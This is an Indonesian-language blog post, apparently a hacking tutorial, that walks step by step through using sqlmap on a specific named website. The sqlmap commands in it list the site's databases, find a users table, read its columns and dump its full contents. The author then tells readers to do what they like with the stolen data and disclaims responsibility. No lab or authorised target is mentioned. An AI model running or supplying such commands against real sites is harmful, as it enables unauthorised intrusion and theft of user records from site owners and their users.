1.buka sqlmap kalian
Application - Backtrack - Exploitation - Web Exploitation Tools - SqlMAP
2.setelah terbuka tuliskan syntax berikut
ex= python sqlmap.py –u http://uselessjunk.com/article_full.php?id=12689 --dbs
-u = url
--dbs = kita mencari nama databasenya...
3. Setelah ketemu nama databasenya yaitu="uselessj_uj2006"
tuliskan syntax berikut ex= python sqlmap.py –u http://uselessjunk.com/article_full.php?id=12689 -D uselessj_uj2006 --tables
--tables = untuk mencari nama table..
4. Nama table akan keluar dan hasilny ternyata ada table user,.
oke untuk melihat isi columnsny tuliskan syntax berikut...:)
ex= python sqlmap.py -u http://uselessjunk.com/article_full.php?id=12689 -D uselessj_uj2006 -T tbl_users --columns
lanjut..
ex= pytho sqlmap.py -u http://uselessjunk.com/article_full.php?id=12689 -D uselessj_uj2006 -T tbl_users --dump
fungsi dump untuk mengambil semua isi di table admin..hasil dump bisa diliat di dir sqlmap itu sendiri..;)
oke kalo udah gini terserah kalian mau diapakan..ane gak tanggung jawab yee..sekedar sharing aja buat pembelajaran.
0 komentar:
Post a Comment